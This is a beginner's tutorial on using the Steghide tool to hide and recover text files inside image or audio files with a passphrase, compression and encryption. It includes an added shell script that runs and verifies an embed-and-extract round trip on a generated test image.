
Steganography using STEGHIDE

Guide to Steghide Tool


In this article, we’ll learn about Steghide. There are various steganography tools available, but what differentiates Steghide is that it uses a variety of algorithms to encrypt the data. Moreover, Steghide supports hiding data behind any image (jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc.

Introduction to Steganography

In digital steganography, electronic communications may incorporate steganographic coding inside a transport layer, such as a document file, picture file, program or protocol. The sender can begin with a harmless picture and make a few alterations to it in order to hide data, so that the alteration goes unnoticed by anyone who is not specifically looking for it.


Features

Compression of embedded data

BMP, GIF and JPG supported

Encryption of embedded data

Decryption via password

Uses various algorithms for encryption


STEP 1: Open your terminal and type the following command to install Steghide:

apt-get install steghide


For help:

steghide --help


STEP 2: Embedding Data in The Image

Here I have two files, a .txt file and a .jpeg file. Our aim is to hide the text file behind the jpeg image.

steghide embed -ef <txt filename> -cf <media filename>


Steghide asks for a passphrase while embedding; remember it, because it is needed again for extraction. After this you may delete the text file, as it is now hidden behind the image. In the next step we will extract the text file back from the image file.

STEP 3: Extraction of Data Via Steghide

Open a terminal and enter the following command:

steghide extract -sf <media filename>

To extract, provide the password that you set earlier when embedding.

To get the details of the image, enter the following command:

steghide info <media filename>


Compression Mode

If we want to compress the text file before hiding it, we use the following command. The compression level can vary from 1 to 9: level 1 gives the fastest compression, whereas level 9 gives the best compression.

steghide embed -ef <txt filename> -cf <media filename> -z 2

Encrypting Algorithms

We can also encrypt the data that we are hiding with a chosen encryption algorithm. This is done with the following command:

steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>
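The embed, compression, encryption and extraction steps above, combined into one unattended round trip that confirms the extracted file is byte-identical before the original is deleted. This is an added example, not part of the original post; the file names, passphrase and generated BMP cover are constructed for the demo.

```sh
#!/bin/sh
# Added example: unattended steghide round trip with an integrity check.
# File names, passphrase and cover image are constructed for this demo.

steghide_roundtrip() {
    command -v steghide >/dev/null 2>&1 || return 127   # steghide not installed
    work=$(mktemp -d) || return 1
    # Constructed passphrase. -p exposes it in the process list, so use the
    # interactive prompt outside of a throwaway demo.
    pass='constructed-demo-passphrase'
    printf 'constructed test secret\n' > "$work/secret.txt"

    # Constructed cover: 128x128 24-bit BMP = 54-byte header + random pixels.
    {
        printf 'BM\066\300\000\000\000\000\000\000\066\000\000\000'
        printf '\050\000\000\000\200\000\000\000\200\000\000\000'
        printf '\001\000\030\000\000\000\000\000\000\300\000\000'
        printf '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000'
        head -c 49152 /dev/urandom
    } > "$work/cover.bmp"

    rc=1
    # -sf writes a separate stego file; without it the cover is overwritten.
    # -z 9 is maximum compression; `steghide encinfo` lists valid -e names.
    # -xf extracts to a new path so the original file is not clobbered.
    if steghide embed -q -ef "$work/secret.txt" -cf "$work/cover.bmp" \
            -sf "$work/stego.bmp" -z 9 -e rijndael-128 -p "$pass" &&
       steghide extract -q -sf "$work/stego.bmp" -xf "$work/out.txt" -p "$pass"
    then
        # Only a byte-identical extraction makes deleting the original safe.
        cmp -s "$work/secret.txt" "$work/out.txt" && rc=0
    fi
    rm -rf "$work"
    return "$rc"
}

# Status 0 = verified, 127 = steghide missing, anything else = failed.
steghide_roundtrip && echo "round trip verified" || echo "not verified (status $?)"
```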


For Windows please click the link below to download :



Reviews and Comments will be appreciated. Thanks ☺
